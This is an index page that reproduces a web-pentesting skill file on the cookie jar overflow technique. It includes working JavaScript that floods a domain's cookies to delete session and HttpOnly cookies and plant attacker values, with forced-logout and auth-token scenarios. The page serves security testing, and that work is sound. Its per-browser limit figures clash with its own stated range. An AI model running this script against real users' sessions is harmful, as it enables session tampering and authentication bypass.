OpenSkillIndex← back to search

Hacktricks-skills cookie-jar-overflow

Web pentesting technique to overflow browser cookie storage and force deletion of existing cookies. Use this skill when testing for cookie manipulation vulnerabilities, when you need to remove or overwrite HttpOnly cookies, or when analyzing cookie-based authentication bypass scenarios. Trigger this skill for any cookie-related security testing, browser storage attacks, or session manipulation tasks.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/hacking-with-cookies/cookie-jar-overflow/SKILL.MD
source content

Cookie Jar Overflow

A browser-based attack technique that exploits the limit on cookies per domain to force deletion of existing cookies, including HttpOnly cookies.

What is Cookie Jar Overflow?

Browsers enforce a limit on the number of cookies that can be stored per domain (typically 18-200 cookies depending on browser). When this limit is exceeded, the browser automatically deletes the oldest cookies to make room for new ones. This behavior can be weaponized to:

  • Force deletion of specific cookies - including session tokens
  • Overwrite HttpOnly cookies - by deleting them and setting a new value
  • Bypass cookie-based security controls - by removing authentication cookies

When to Use This Technique

Use cookie jar overflow when:

  1. Testing cookie-based authentication - Can you force logout by overflowing the jar?
  2. Analyzing HttpOnly cookie security - Can you manipulate cookies marked as HttpOnly?
  3. Session fixation attacks - Can you remove existing session cookies?
  4. Cookie persistence testing - How does the application handle missing cookies?
  5. Third-party cookie scenarios - Understanding domain-specific cookie limits

Implementation

Basic Cookie Overflow

// Set many cookies to overflow the jar
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i}; Secure; SameSite=None; path=/`
}

// Remove all cookies by setting expiration to past date
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/`
}

Targeted Cookie Deletion

// First, overflow to delete the target cookie
for (let i = 0; i < 700; i++) {
  document.cookie = `overflow${i}=${i}; path=/`
}

// Then set your desired cookie value
document.cookie = `target_cookie=malicious_value; path=/`

Complete Attack Script

// Cookie Jar Overflow Attack
function overflowCookieJar(targetCookieName) {
  const NUM_COOKIES = 700;
  
  // Phase 1: Overflow the cookie jar
  console.log(`[+] Setting ${NUM_COOKIES} cookies to overflow jar...`);
  for (let i = 0; i < NUM_COOKIES; i++) {
    document.cookie = `overflow_${i}=${i}; path=/; SameSite=None; Secure`
  }
  
  // Phase 2: Clean up overflow cookies
  console.log('[+] Cleaning up overflow cookies...');
  for (let i = 0; i < NUM_COOKIES; i++) {
    document.cookie = `overflow_${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/`
  }
  
  // Phase 3: Set target cookie (if needed)
  if (targetCookieName) {
    console.log(`[+] Setting target cookie: ${targetCookieName}`);
    document.cookie = `${targetCookieName}=attacker_value; path=/`
  }
  
  console.log('[+] Cookie jar overflow complete');
}

Important Considerations

Third-Party Cookies

Cookies pointing to different domains won't be overwritten by this technique. Each domain has its own cookie jar limit.

HttpOnly Cookies

While HttpOnly cookies cannot be read via JavaScript, they CAN be deleted through cookie jar overflow. After deletion, you can set a new cookie with the same name (though it won't have the HttpOnly flag).

Browser Variations

Different browsers have different cookie limits:

  • Chrome: ~180 cookies per domain
  • Firefox: ~180 cookies per domain
  • Safari: ~180 cookies per domain
  • Edge: ~180 cookies per domain

Modern Browser Protections

  • SameSite cookies: May limit cross-site cookie setting
  • Secure flag: Required for HTTPS-only cookies
  • Cookie partitioning: Some browsers isolate cookies per site

Testing Checklist

When testing with this technique:

  • Verify the application's cookie storage limits
  • Test with different cookie attributes (Secure, HttpOnly, SameSite)
  • Check if session cookies can be removed
  • Verify application behavior when cookies are missing
  • Test third-party cookie scenarios
  • Document browser-specific behaviors

Example Attack Scenarios

Scenario 1: Session Logout

Force a user to logout by removing their session cookie:

// Inject this script to force logout
overflowCookieJar('session_id');

Scenario 2: Cookie Value Manipulation

Overwrite a preference cookie:

// Overflow to delete, then set new value
overflowCookieJar('user_preferences');
document.cookie = 'user_preferences=malicious_config; path=/';

Scenario 3: Authentication Bypass

Remove authentication cookies to test fallback mechanisms:

// Remove auth cookies and observe behavior
overflowCookieJar('auth_token');
overflowCookieJar('csrf_token');

References

Safety Notes

  • Only use this technique on systems you own or have explicit permission to test
  • Document all findings for the security team
  • Consider the impact on legitimate users during testing
  • Test in isolated environments when possible